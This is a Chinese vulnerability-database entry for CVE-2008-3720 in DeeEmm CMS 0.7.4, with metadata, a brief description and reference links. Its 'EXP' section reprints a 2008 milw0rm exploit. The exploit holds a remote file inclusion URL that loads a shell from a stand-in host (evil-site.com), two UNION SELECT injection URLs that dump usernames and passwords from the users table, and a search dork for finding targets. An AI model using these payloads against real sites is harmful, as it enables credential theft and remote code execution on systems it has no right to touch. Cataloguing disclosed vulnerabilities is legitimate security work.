DeeEmm DMCMS user_language.php 代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115907 漏洞类型 SQL注入
发布时间 2008-08-15 更新时间 2008-08-20
CVE编号 CVE-2008-3720 CNNVD-ID CNNVD-200808-258
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6250
https://www.securityfocus.com/bid/80959
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-258
|漏洞详情
DeeEmmCMS(DMCMS)是一套网站管理系统。DeeEmmCMS(DMCMS)0.7.4版本中的index.php存在SQL注入漏洞,远程攻击者可以借助page参数,执行任意的SQL指令。
|漏洞EXP
#####################################################################################
####                        DeeEmm CMS Sql Injection/Rfi                         ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : http://surfnet.dl.sourceforge.net/sourceforge/dmcms/dmcms_074.tar.gz
#                                                                                   #
#Home Page : www.deeemm.com                                                         #
#                                                                                   #
#DORK : "DeeEmm CMS"                                                                #
#                                                                                   #
#####################################################################################
#                                      [Rfi]                                        #
#                                                                                   #
#http://Site/user_language.php?INDM=r3d.w0rm&language_dir=http://evil-site.com/shell.txt?
#                                                                                   #
#                                 [Sql Injection]                                   #
#                                                                                   #
#http://Site/index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users/*                                #
#http://Site/index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users                                #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-08-15]
|受影响的产品
Deeemm Dmcms 0.7.4
|参考资料

来源:XF
名称:dmcms-page-id-sql-injection(44506)
链接:http://xforce.iss.net/xforce/xfdb/44506
来源:MILW0RM
名称:6250
链接:http://www.milw0rm.com/exploits/6250
来源:VUPEN
名称:ADV-2008-2411
链接:http://www.frsirt.com/english/advisories/2008/2411
来源:SREASON
名称:4169
链接:http://securityreason.com/securityalert/4169